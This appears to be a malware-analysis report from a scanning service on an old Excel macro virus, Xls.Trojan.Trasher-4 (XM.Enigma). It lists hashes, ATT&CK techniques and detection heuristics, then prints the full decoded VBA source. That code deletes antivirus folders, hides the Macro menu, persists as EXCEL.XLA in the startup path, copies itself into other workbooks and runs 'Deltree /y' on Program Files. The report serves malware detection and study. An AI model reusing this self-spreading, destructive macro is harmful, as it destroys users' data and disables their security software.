Xls.Trojan.Trasher-4 — Office (OLE) malware analysis

Static analysis result for SHA-256 009b0ba665439911…

MALICIOUS

Office (OLE)

20.0 KB Created: 1998-02-12 17:58:36 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 63df2acd751c8a53dc28c76cb4af14d4 SHA-1: e8912e35b3463c27f830f7052bf11a38fc4877d6 SHA-256: 009b0ba665439911ab0a843b81d247abd7c7e1d455b60370805355e085587b01
280 Risk Score

Malware Insights

Xls.Trojan.Trasher-4 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1027 Obfuscated Files or Information

The Auto_Open VBA macro executes upon opening the document. It attempts to delete common antivirus software installations and then copies itself to the Excel startup path as 'EXCEL.XLA' to achieve persistence. The macro also contains obfuscation techniques and calls to unknown functions like 'Enigma' and 'CHG', suggesting a malicious intent to evade detection and maintain control.

Heuristics 5

  • ClamAV: Xls.Trojan.Trasher-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Trasher-4
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2682 bytes
SHA-256: 2e862e1cb278d2d561594800170ea4d9feca8f5446c31121b85d48b1d60a018b
Detection
ClamAV: Xls.Trojan.Trasher-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"

Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Application.ScreenUpdating = False
Application.DisplayAlerts = False
Kill "C:\Program Files\AntiViral Toolkit Pro\*.*"
MenuBars(xlWorksheet).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\FindVirus\*.*"
MenuBars(xlModule).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\f-macro\*.*"
MenuBars(xlNoDocuments).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\Command Software\F-PROT95\*.*"
MenuBars(xlInfo).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\McAfee\VirusScan\*.*"
MenuBars(xlChart).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\Norton AntiVirus\*.*"
Call Enigma
If CHG() Then
GoTo EBU:
Else
Call ING
End If
EBU:
Application.OnSheetActivate = "EXCEL.XLA!DIB"
End2:
End Sub

Function CHG() As Boolean
Attribute CHG.VB_ProcData.VB_Invoke_Func = " \n14"
CHG = False
For q = 1 To Application.Workbooks.Count
If Application.Workbooks(q).Name = "EXCEL.XLA" Then
For u = 1 To Application.Workbooks("EXCEL.XLA").Modules.Count
If Application.Workbooks("EXCEL.XLA").Modules(u).Name = "Sheet3" Then
CHG = True
End If
Next u
End If
Next q
End Function

Function ING()
Attribute ING.VB_ProcData.VB_Invoke_Func = " \n14"
ab = ActiveWorkbook.Name
Workbooks(ab).SaveCopyAs Application.StartupPath + "\EXCEL.XLA"
Workbooks.Open (Application.StartupPath + "\EXCEL.XLA")
Windows("EXCEL.XLA").Visible = False
Application.Workbooks("EXCEL.XLA").Save
End Function

Function ADI() As Boolean
Attribute ADI.VB_ProcData.VB_Invoke_Func = " \n14"
ac = ActiveWorkbook.Name
ADI = False
For y = 1 To Application.Workbooks(ac).Modules.Count
If Application.Workbooks(ac).Modules(y).Name = "Sheet3" Then
ADI = True
End If
Next y
End Function

Sub DIB()
Attribute DIB.VB_ProcData.VB_Invoke_Func = " \n14"
ad = ActiveWorkbook.Name
If ADI() Then
GoTo KI
End If
Application.ScreenUpdating = False
Application.Windows("EXCEL.XLA").Visible = True
Workbooks("EXCEL.XLA").Activate
Sheets("Sheet3").Visible = True
Workbooks("EXCEL.XLA").Sheets("Sheet3").Copy Before:=Workbooks(ad).Sheets(1)
Workbooks(ad).Sheets("Sheet3").Visible = False
Workbooks("EXCEL.XLA").Sheets("Sheet3").Visible = False
Windows("EXCEL.XLA").Visible = False
KI:
Close
End Sub

Sub Enigma()
Attribute Enigma.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
If Day(Now()) = Int((31 * Rnd) + 1) Then
Shell ("Deltree  /y C:\Progra~1")
Do
MsgBox "Your computer is infected XM.Enigma virus by ULTRAS", 16, "ULTRAS"
Loop
End If
End Sub